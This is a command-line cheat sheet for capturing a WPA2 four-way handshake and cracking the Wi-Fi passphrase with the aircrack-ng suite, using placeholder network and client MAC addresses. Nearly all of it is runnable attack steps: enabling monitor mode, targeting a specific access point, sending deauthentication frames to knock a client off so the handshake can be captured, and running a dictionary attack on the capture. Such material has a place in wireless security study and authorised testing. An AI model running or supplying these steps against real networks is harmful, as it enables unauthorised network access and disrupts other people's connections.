WPA Handshake Capture and Crack the Passphrase

wifi_wpa_crack

# Capture WPA Handshake and use a dictionary to find the WiFi passphrase
# https://www.aircrack-ng.org/doku.php?id=cracking_wpa
# https://www.kali.org/tools/aircrack-ng/


# Install Wi-Fi Adapter Drivers and reboot
sudo apt install firmware-ath9k-htc
sudo reboot

# Check interface name
ifconfig
ip a

# Identify target network details
sudo airodump-ng wlan0mon

#--------------------------------------------------------
# Target WiFi SSID:            TestNetwork
# Target WiFi BSSID (MAC):     AA:BB:CC:DD:EE:FF
# Target WiFi Channel:         11
# Target WiFi ENC-CIPHER-AUTH: WPA2 CCMP PSK
#--------------------------------------------------------

export TARGET_BSSID=AA:BB:CC:DD:EE:FF
export TARGET_CH=11

# Check Monitor Mode Availability
sudo airmon-ng
sudo airmon-ng check

# Kill processes if needed
sudo airmon-ng check kill

# Start monitor mode on interface wlan0 on target channel
sudo airmon-ng start wlan0 $TARGET_CH

# Check new interface name
# New interface name will be wlan0mon
ifconfig
ip a

# Monitor only target SSID and look for connected clients
sudo airodump-ng --bssid $TARGET_BSSID --channel $TARGET_CH wlan0mon

#-----------------------------------------
# Connected Client MAC: 11:22:33:44:55:66
#-----------------------------------------

export CLIENT_MAC=11:22:33:44:55:66

# Start to capture and wait for handshake
sudo airodump-ng --bssid $TARGET_BSSID --channel $TARGET_CH --write handshake_file wlan0mon

# Deauthenticate the connected client to make things faster
sudo aireplay-ng --deauth 1 -a $TARGET_BSSID -c $CLIENT_MAC wlan0mon

# Run aircrack-ng to crack the pre-shared key
sudo aircrack-ng -b $TARGET_BSSID -w pass.txt handshake_file*.cap